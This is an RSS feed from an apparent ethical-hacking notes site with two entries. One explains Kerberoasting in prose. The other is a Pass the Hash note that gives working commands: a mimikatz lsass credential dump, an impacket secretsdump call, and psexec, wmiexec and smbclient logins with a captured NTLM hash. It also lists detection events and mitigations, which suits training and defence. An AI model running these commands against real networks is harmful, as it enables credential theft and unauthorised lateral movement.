<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>notes on ethicalhacker.tech</title>
		<link>https://ethicalhacker.tech/notes/</link>
		<description>Recent content in notes on ethicalhacker.tech</description>
		<generator>Hugo</generator>
		<language>en-GB</language>
		
		
		
		
			<atom:link href="https://ethicalhacker.tech/notes/index.xml" rel="self" type="application/rss+xml" />
			<item>
				<title>Kerberoasting</title>
				<link>https://ethicalhacker.tech/notes/kerberoasting/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/kerberoasting/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Kerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account&amp;rsquo;s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.&lt;/p&gt;&#xA;&lt;p&gt;The attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.&lt;/p&gt;</description>
			</item>
			<item>
				<title>Pass the Hash</title>
				<link>https://ethicalhacker.tech/notes/pass-the-hash/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/pass-the-hash/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.&lt;/p&gt;&#xA;&lt;h2 id=&#34;requirements&#34;&gt;requirements&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A captured NTLM hash (from mimikatz, secretsdump, or similar)&lt;/li&gt;&#xA;&lt;li&gt;Network access to the target&lt;/li&gt;&#xA;&lt;li&gt;Target must accept NTLM authentication (most Windows environments do)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;attack-steps&#34;&gt;attack steps&lt;/h2&gt;&#xA;&lt;h3 id=&#34;1-obtain-a-hash&#34;&gt;1. obtain a hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# dump from lsass on a compromised host&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;mimikatz &lt;span class=&#34;c1&#34;&gt;# sekurlsa::logonpasswords&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# remote dump via impacket&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;secretsdump.py domain/user:password@10.0.0.5&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&#34;2-authenticate-with-the-hash&#34;&gt;2. authenticate with the hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# psexec with hash&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;psexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# wmiexec&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;wmiexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# smbclient&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;smbclient.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;detection&#34;&gt;detection&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Event ID &lt;strong&gt;4624&lt;/strong&gt; logon type 3 (network) with NTLM authentication where Kerberos would be expected&lt;/li&gt;&#xA;&lt;li&gt;Mismatched workstation names or unusual source IPs for privileged accounts&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;mitigation&#34;&gt;mitigation&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Enable &lt;strong&gt;Protected Users&lt;/strong&gt; security group — prevents NTLM auth for member accounts&lt;/li&gt;&#xA;&lt;li&gt;Disable NTLM where possible via GPO (&lt;code&gt;Network security: Restrict NTLM&lt;/code&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Use &lt;strong&gt;Credential Guard&lt;/strong&gt; to protect lsass from memory reads&lt;/li&gt;&#xA;&lt;li&gt;Enforce tiered administration to limit where privileged hashes are cached&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
			</item>
	</channel>
</rss>
